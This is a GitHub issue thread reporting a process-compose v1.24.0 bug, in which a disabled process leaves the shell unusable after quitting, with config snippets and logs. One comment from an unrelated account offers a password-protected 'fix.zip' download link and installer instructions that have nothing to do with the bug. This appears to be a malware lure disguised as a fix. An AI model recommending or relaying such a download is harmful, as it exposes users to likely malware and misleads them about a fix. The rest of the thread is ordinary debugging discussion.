### ISSUE TITLE
when a task is disabled, the terminal window hangs after quitting

### ISSUE THREAD

**Issue by thenbe** [F1bonacc1/process-compose#239]
## Defect

Make sure that these boxes are checked before submitting your issue -- thank you!

- [x] Included the relevant configuration snippet
- [x] Included the relevant process-compose log (log location: `process-compose info`)
- [x] Included a [Minimal, Complete, and Verifiable example] (https://stackoverflow.com/help/mcve)

#### Version of `process-compose`:

1.24.0

#### OS environment:

- system: `"x86_64-linux"`
- host os: `Linux 6.6.47, NixOS, 24.11 (Vicuna), 24.11.20240821.c374d94`

#### Steps or code to reproduce the issue:

```yaml
version: "0.5"

processes:
  api:
    disabled: true # <-- The bug only occurs when this is set to `true`
    command: echo hello
```

1. Use the config posted above.
1. Run `process-compose up --keep-project`
1. Attempt to quit process-compose by pressing `F10` then `enter`.
1. .
   - EXPECTED: process-compose should quit and you should be able to use the shell. You can run `echo foo` in the same shell. Pressing `ctrl+c` enters a "new line".
   - ACTUAL: process-compose quits, but the shell is not in a usable state. You are not able to run a command in the same shell. Pressing `ctrl+c` prints the literal characters `^C` on the screen.

### Logs

```
24-08-29 08:00:03.984 INF Process Compose v1.24.0
24-08-29 08:00:03.984 INF Loaded project from /home/nbe/projects/sail/process-compose.yaml
24-08-29 08:00:03.984 INF Global shell command: bash -c
24-08-29 08:00:03.984 INF start http server listening :8080
24-08-29 08:00:03.984 DBG Spinning up 0 processes. Order: []
24-08-29 08:00:03.984 INF Project completed
24-08-29 08:00:03.984 DBG Loaded settings from /home/nbe/.config/process-compose/settings.yaml
24-08-29 08:00:03.985 DBG Shortcuts loaded from /home/nbe/.config/process-compose/shortcuts.yaml
24-08-29 08:00:06.793 DBG Shutting down 0 processes. Order: []
24-08-29 08:00:06.794 INF Thank you for using process-compose
```

If you have difficulty reproducing this, let me know and I'll record a video.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thenbe** [comment]
I noticed that if I change the value of disabled to `false`, the issue does not occur; everything works as expected.

```diff
version: '0.5'

processes:
  api:
-    disabled: true
+    disabled: false
    command: echo hello
```

Here are the logs:

```
24-08-29 08:04:06.147 INF Process Compose v1.24.0
24-08-29 08:04:06.147 INF Loaded project from /home/nbe/projects/sail/process-compose.yaml
24-08-29 08:04:06.147 INF Global shell command: bash -c
24-08-29 08:04:06.147 INF start http server listening :8080
24-08-29 08:04:06.147 DBG Spinning up 1 processes. Order: ["api"]
24-08-29 08:04:06.147 DBG Loaded settings from /home/nbe/.config/process-compose/settings.yaml
24-08-29 08:04:06.147 INF Started command=["bash","-c","echo hello"] process=api
24-08-29 08:04:06.148 DBG Shortcuts loaded from /home/nbe/.config/process-compose/shortcuts.yaml
24-08-29 08:04:06.198 INF Exited exit_code=0 process=api
24-08-29 08:04:06.198 INF Project completed
24-08-29 08:04:07.778 DBG Shutting down 0 processes. Order: []
24-08-29 08:04:08.779 DBG Logs monitoring canceled
24-08-29 08:04:08.779 INF Thank you for using process-compose
```

Could this line be significant?

```
24-08-29 08:04:08.779 DBG Logs monitoring canceled
```
